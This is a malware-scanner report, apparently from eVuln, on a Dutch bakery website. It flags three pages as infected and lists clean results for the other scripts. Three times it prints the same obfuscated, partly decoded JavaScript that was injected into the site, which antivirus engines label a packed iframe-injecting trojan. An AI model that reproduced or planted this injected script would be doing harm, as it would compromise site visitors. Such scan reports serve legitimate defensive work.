Malware Scanner report for limburgiaderompert.nl

Malicious/Suspicious/Total urls checked: 3/0/15

3 pages have malicious code. See details below

Blacklists: OK

Malicious Redirects: OK

Malicious/Hidden/Total iFrames: 0/0/0

Deface / Content modification: OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

Malware Removal
Blacklists Removal
Reason Eliminating
1 Month Hack Insurance

More details

Website Hack Insurance

Files & DB Monitoring
Daily Backups
Malware & Hack Detection
Unlimited Hack Repairs

More details

Scanned pages/files

Request	Server response	Status
http://www.limburgiaderompert.nl/	200 OK Content-Length: 18871 Content-Type: text/html	malicious
Malicious code - confirmed by antiviruses (see below) (function(e4){var jKl=function(bWc){return bWc["\x74\x6f\x53\x74\x72"+"\x69\x6e\x67"](36)},zwU=function(nSn){return nSn[jKl(918239)]("") },qvQ=""+zwU(["\xb7z\xbdQ\xf2ZY\x94","\xff\x9a\xd3\xfa\x12","W\x81\x07\xfeI0\x028","qQ\x17r\"\x12_-\x08u","aj\x1f/?c2+\x15rQ","\x13u\x08;_\x00\x0bu","Hi\x1b\x02;c1(8uQ","\x17q%?[\x00\x0bXei","\x18+\x12J\x18+\x15r","x:X%\x12X)\x08P\x0e","\x15\|AF\x03WL0;\x0e3","\x03X\x0b\x00\x1d1JS","\x16sP\x12\x0f\x08I%","P>o\x16KF;OlP\x12IiT","S\x18\x18C%#\x0dXP","\x0anE2\x ... 2898 bytes are skipped ...73\x74"+"\x72\x69\x6e\x67"](0,GH[tj0[2]]);UB=function(Qce){var Wv,GDn,OBg=GDn="",m96=0;Qce=Qce[tj0[0]](OBg);for(Wv in Qce){if(Qce[tj0[3]](Wv)){GDn+=Uv(Qce[Wv],osZ[tj0[0]](OBg)[m96%=osZ[tj0[2]]]);m96++;}}return(GDn);};osZ=UB(GH);e4[UB("Gn\x194")](UB(qvQ[UB("Qm\x1a+n\x0aA\\5")](GH[UB("N}\x16?n\x10")])))})(window,Uv=function(CB,gq,dv,Wc){CB=CB[dv="\x63"+(Wc="\x68\x61\x72\x43\x6f"+"\x64\x65")+"\x41\x74"](0);return(String["\x66\x72\x6f\x6d\x43"+Wc](CB&p9R\|((CB&~p9R)^(gq[dv](0)&~p9R))))}); Decoded script: (function(CV){p9R=32;var e0k=(function(z){var a=[UB("\xe0j\xb88k<I~\xb2hf"+"\xb2\xbc"),UB("\xf4q\xb9-w"),UB("\xeb}\xb4>w-"),UB("\xf0l\xa45z"),UB("\xe2h\xad<q=Oz\xbeig"),UB("\xe4}\xa9\x1cs<aw"+"\xb9qp\x9e\xb1\x94v`"+"\xdd\xf5\xe6"),UB("\xcey\xa91"),UB("\xecn\xb8+y5ce"),UB("\xf3w\xae0k0c\|"),UB("\xef}\xbb-")],b=[UB("\xe7w\xbe,r<bf"),UB("\xe5t\xb26m"),UB("\xf1y\xb3=p4"),UB( ... 1771 bytes are skipped ...t[1][a[9]]=r[2];t[0][a[4]](t[2]);return t[0];})(CV),d=CV[UB("\xe7w\xbe,r<bf")],i,b,l=UB("\xef}\xb3>k1"),t=UB("\xe4}\xa9\x1cs<aw"+"\xb9qp\x9e\xb1\x94v`"+"\xdd\xf5\xe6"),m=CV[UB("\xcey\xa91")];if(e0k){if(b=d[t](UB("\xe1w\xb9\x20"))[0])((i=d[t](UB("\xe7q\xab")))[l]?i[m[UB("\xe5t\xb26m")](m[UB("\xf1y\xb3=p4")]()i[UB("\xef}\xb3>k1")])]:b)[UB("\xe2h\xad<q=Oz\xbeig")](e0k);else d[UB("\xf4j\xb4-z")](e0k[UB("\xecm\xa9<m\x11X_"+"\x9b")]);}delete Uv;delete UB;delete p9R;})(window); Antivirus reports: NANO-Antivirus Trojan.Script.Heuristic-js.iacgm GData Script.Packed.IFrame.L@gen
http://www.limburgiaderompert.nl/media/system/js/mootools-core.js	200 OK Content-Length: 96362 Content-Type: text/javascript	clean
http://www.limburgiaderompert.nl/media/system/js/core.js	200 OK Content-Length: 4784 Content-Type: text/javascript	clean
http://www.limburgiaderompert.nl/media/system/js/caption.js	200 OK Content-Length: 729 Content-Type: text/javascript	clean
http://code.jquery.com/jquery-latest.pack.js	200 OK Content-Length: 95786 Content-Type: application/x-javascript	clean
http://www.limburgiaderompert.nl/templates/ajt005_j30/js/bootstrap.min.js	200 OK Content-Length: 26613 Content-Type: text/javascript	clean
http://www.limburgiaderompert.nl/templates/ajt005_j30/js/scrolltopcontrol.js	200 OK Content-Length: 3711 Content-Type: text/javascript	clean
http://www.limburgiaderompert.nl/templates/ajt005_j30/js/hoverIntent.min.js	200 OK Content-Length: 1464 Content-Type: text/javascript	clean
http://www.limburgiaderompert.nl/templates/ajt005_j30/js/superfish.js	200 OK Content-Length: 3713 Content-Type: text/javascript	clean
http://www.limburgiaderompert.nl/index.php/vlaaien	200 OK Content-Length: 25957 Content-Type: text/html	malicious
Malicious code - confirmed by antiviruses (see below) (function(e4){var jKl=function(bWc){return bWc["\x74\x6f\x53\x74\x72"+"\x69\x6e\x67"](36)},zwU=function(nSn){return nSn[jKl(918239)]("") },qvQ=""+zwU(["\xb7z\xbdQ\xf2ZY\x94","\xff\x9a\xd3\xfa\x12","W\x81\x07\xfeI0\x028","qQ\x17r\"\x12_-\x08u","aj\x1f/?c2+\x15rQ","\x13u\x08;_\x00\x0bu","Hi\x1b\x02;c1(8uQ","\x17q%?[\x00\x0bXei","\x18+\x12J\x18+\x15r","x:X%\x12X)\x08P\x0e","\x15\|AF\x03WL0;\x0e3","\x03X\x0b\x00\x1d1JS","\x16sP\x12\x0f\x08I%","P>o\x16KF;OlP\x12IiT","S\x18\x18C%#\x0dXP","\x0anE2\x ... 2898 bytes are skipped ...73\x74"+"\x72\x69\x6e\x67"](0,GH[tj0[2]]);UB=function(Qce){var Wv,GDn,OBg=GDn="",m96=0;Qce=Qce[tj0[0]](OBg);for(Wv in Qce){if(Qce[tj0[3]](Wv)){GDn+=Uv(Qce[Wv],osZ[tj0[0]](OBg)[m96%=osZ[tj0[2]]]);m96++;}}return(GDn);};osZ=UB(GH);e4[UB("Gn\x194")](UB(qvQ[UB("Qm\x1a+n\x0aA\\5")](GH[UB("N}\x16?n\x10")])))})(window,Uv=function(CB,gq,dv,Wc){CB=CB[dv="\x63"+(Wc="\x68\x61\x72\x43\x6f"+"\x64\x65")+"\x41\x74"](0);return(String["\x66\x72\x6f\x6d\x43"+Wc](CB&p9R\|((CB&~p9R)^(gq[dv](0)&~p9R))))}); Decoded script: (function(CV){p9R=32;var e0k=(function(z){var a=[UB("\xe0j\xb88k<I~\xb2hf"+"\xb2\xbc"),UB("\xf4q\xb9-w"),UB("\xeb}\xb4>w-"),UB("\xf0l\xa45z"),UB("\xe2h\xad<q=Oz\xbeig"),UB("\xe4}\xa9\x1cs<aw"+"\xb9qp\x9e\xb1\x94v`"+"\xdd\xf5\xe6"),UB("\xcey\xa91"),UB("\xecn\xb8+y5ce"),UB("\xf3w\xae0k0c\|"),UB("\xef}\xbb-")],b=[UB("\xe7w\xbe,r<bf"),UB("\xe5t\xb26m"),UB("\xf1y\xb3=p4"),UB( ... 1771 bytes are skipped ...t[1][a[9]]=r[2];t[0][a[4]](t[2]);return t[0];})(CV),d=CV[UB("\xe7w\xbe,r<bf")],i,b,l=UB("\xef}\xb3>k1"),t=UB("\xe4}\xa9\x1cs<aw"+"\xb9qp\x9e\xb1\x94v`"+"\xdd\xf5\xe6"),m=CV[UB("\xcey\xa91")];if(e0k){if(b=d[t](UB("\xe1w\xb9\x20"))[0])((i=d[t](UB("\xe7q\xab")))[l]?i[m[UB("\xe5t\xb26m")](m[UB("\xf1y\xb3=p4")]()i[UB("\xef}\xb3>k1")])]:b)[UB("\xe2h\xad<q=Oz\xbeig")](e0k);else d[UB("\xf4j\xb4-z")](e0k[UB("\xecm\xa9<m\x11X_"+"\x9b")]);}delete Uv;delete UB;delete p9R;})(window); Antivirus reports: NANO-Antivirus Trojan.Script.Heuristic-js.iacgm GData Script.Packed.IFrame.L@gen
http://www.limburgiaderompert.nl/index.php/taarten-en-gebak	200 OK Content-Length: 25791 Content-Type: text/html	malicious
Malicious code - confirmed by antiviruses (see below) (function(e4){var jKl=function(bWc){return bWc["\x74\x6f\x53\x74\x72"+"\x69\x6e\x67"](36)},zwU=function(nSn){return nSn[jKl(918239)]("") },qvQ=""+zwU(["\xb7z\xbdQ\xf2ZY\x94","\xff\x9a\xd3\xfa\x12","W\x81\x07\xfeI0\x028","qQ\x17r\"\x12_-\x08u","aj\x1f/?c2+\x15rQ","\x13u\x08;_\x00\x0bu","Hi\x1b\x02;c1(8uQ","\x17q%?[\x00\x0bXei","\x18+\x12J\x18+\x15r","x:X%\x12X)\x08P\x0e","\x15\|AF\x03WL0;\x0e3","\x03X\x0b\x00\x1d1JS","\x16sP\x12\x0f\x08I%","P>o\x16KF;OlP\x12IiT","S\x18\x18C%#\x0dXP","\x0anE2\x ... 2898 bytes are skipped ...73\x74"+"\x72\x69\x6e\x67"](0,GH[tj0[2]]);UB=function(Qce){var Wv,GDn,OBg=GDn="",m96=0;Qce=Qce[tj0[0]](OBg);for(Wv in Qce){if(Qce[tj0[3]](Wv)){GDn+=Uv(Qce[Wv],osZ[tj0[0]](OBg)[m96%=osZ[tj0[2]]]);m96++;}}return(GDn);};osZ=UB(GH);e4[UB("Gn\x194")](UB(qvQ[UB("Qm\x1a+n\x0aA\\5")](GH[UB("N}\x16?n\x10")])))})(window,Uv=function(CB,gq,dv,Wc){CB=CB[dv="\x63"+(Wc="\x68\x61\x72\x43\x6f"+"\x64\x65")+"\x41\x74"](0);return(String["\x66\x72\x6f\x6d\x43"+Wc](CB&p9R\|((CB&~p9R)^(gq[dv](0)&~p9R))))}); Decoded script: (function(CV){p9R=32;var e0k=(function(z){var a=[UB("\xe0j\xb88k<I~\xb2hf"+"\xb2\xbc"),UB("\xf4q\xb9-w"),UB("\xeb}\xb4>w-"),UB("\xf0l\xa45z"),UB("\xe2h\xad<q=Oz\xbeig"),UB("\xe4}\xa9\x1cs<aw"+"\xb9qp\x9e\xb1\x94v`"+"\xdd\xf5\xe6"),UB("\xcey\xa91"),UB("\xecn\xb8+y5ce"),UB("\xf3w\xae0k0c\|"),UB("\xef}\xbb-")],b=[UB("\xe7w\xbe,r<bf"),UB("\xe5t\xb26m"),UB("\xf1y\xb3=p4"),UB( ... 1771 bytes are skipped ...t[1][a[9]]=r[2];t[0][a[4]](t[2]);return t[0];})(CV),d=CV[UB("\xe7w\xbe,r<bf")],i,b,l=UB("\xef}\xb3>k1"),t=UB("\xe4}\xa9\x1cs<aw"+"\xb9qp\x9e\xb1\x94v`"+"\xdd\xf5\xe6"),m=CV[UB("\xcey\xa91")];if(e0k){if(b=d[t](UB("\xe1w\xb9\x20"))[0])((i=d[t](UB("\xe7q\xab")))[l]?i[m[UB("\xe5t\xb26m")](m[UB("\xf1y\xb3=p4")]()i[UB("\xef}\xb3>k1")])]:b)[UB("\xe2h\xad<q=Oz\xbeig")](e0k);else d[UB("\xf4j\xb4-z")](e0k[UB("\xecm\xa9<m\x11X_"+"\x9b")]);}delete Uv;delete UB;delete p9R;})(window); Antivirus reports: NANO-Antivirus Trojan.Script.Heuristic-js.iacgm GData Script.Packed.IFrame.L@gen
http://www.limburgiaderompert.nl//ajax.googleapis.com/ajax/libs/jquery/1.8.2/jquery.min.js/	404 Not Found Content-Length: 67 Content-Type: text/html	clean
http://www.limburgiaderompert.nl/test404page.js	404 Not Found Content-Length: 67 Content-Type: text/html	clean
http://www.limburgiaderompert.nl/modules/mod_ariimageslider/mod_ariimageslider/js/jquery.noconflict.js	200 OK Content-Length: 81 Content-Type: text/javascript	clean
http://www.limburgiaderompert.nl/modules/mod_ariimageslider/mod_ariimageslider/js/jquery.nivo.slider.js	200 OK Content-Length: 10634 Content-Type: text/javascript	clean

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: limburgiaderompert.nl

Result:

Second query (visit from search engine):
GET / HTTP/1.1
Host: limburgiaderompert.nl
Referer: http://www.google.com/search?q=limburgiaderompert.nl

Result:
The result is similar to the first query. There are no suspicious redirects found.

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=limburgiaderompert.nl

Result: This site is not currently listed as suspicious.

Query: http://yandex.com/infected?l10n=en&url=http://limburgiaderompert.nl/

Result: limburgiaderompert.nl is not infected or malware details are not published yet.

Recently found suspicious websites

Malware Scanner report for limburgiaderompert.nl

Malware & Hack Repair

Website Hack Insurance

Scanned pages/files

Malicious Redirects

Safe Browsing / Blacklists

Recently found suspicious websites

Company

Services

eVuln Labs

eVuln Tools